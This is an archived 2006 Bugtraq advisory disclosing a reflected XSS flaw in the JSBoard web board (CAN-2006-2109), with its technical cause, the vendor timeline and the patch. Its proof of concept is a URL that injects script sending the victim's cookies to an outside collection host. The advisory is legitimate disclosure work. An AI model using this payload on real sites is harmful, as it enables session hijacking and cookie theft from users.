lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 2 May 2006 05:30:13 +0200
From: Alexander Klink <alexander@...nk.name>
To: bugtraq@...urityfocus.com
Subject: JSBoard XSS vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

============================================
||| Security Advisory AKLINK-SA-2006-001 |||
||| CAN-2006-2109 (CVE candidate)        |||
============================================

JSBoard - Cross Site Scripting Attack
=====================================

Date released: 02.05.2006
Date reported: 30.04.2006
$Revision: 1.1 $

by Alexander Klink
   alexander@...nk.name
   https://www.klink.name/security/aklink-sa-2006-001-jsboard-xss.txt
   (TLS certificate information: https://www.klink.name/tls.txt)
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-2109

Vendor: JoungKyun Kim (Open Source)
Product: JSBoard - a news and discussion web board popular in Korea
Website: http://jsboard.kldp.org
Vulnerability: Non-persistent XSS attack
Class: remote
Status: patched
Severity: low (possible disclosure of session and other cookies)
Releases known to be affected: 2.0.11, 2.0.10
Releases known NOT to be affected: 2.0.12

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

A non-persistent XSS attack can be carried out using variables that
are supposed to be from included files but can be overwritten using
variables defined in the CGI query.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

In the function parse_query_str() in include/print.php every variable
from the CGI request is set as a global variable, regardless of prior
use. As parse_query_str() is typically called after the inclusion of
other files that define variables which are not changed but output
in the rest of the program, this allows an attacker to inject XSS
code, for example Javascript.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of concept:

http://[target]/jsboard/login.php?table=<script>document.location='http://www.cgi-security.com/cgi-bin/cookie.cgi'%2Bdocument.cookie</script>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workaround:

None known.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

* 30.04.2006: Problem reported to author
* 30.04.2006: Author replies and releases patched version 2.0.12

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

Install JSBoard 2.0.12, which fixes this particular attack vector.
Note that CGI query variables are still imported into the global
namespace, which means a similar problem might appear in a later version.
The patch is available from:
http://kldp.net/frs/download.php/3346/2.0.11-2.0.12.patch.tar.gz

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credit:

Alexander Klink (discovery)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFEVs008Q3kKmNSxUURAoNLAJ0bnP+eZ2x4O3Nj57cMtLZKam6tqwCffCdv
Z7Jztkr1x7zn/uOaHy+rTSs=
=k/y4
-----END PGP SIGNATURE-----



Powered by blists - more mailing lists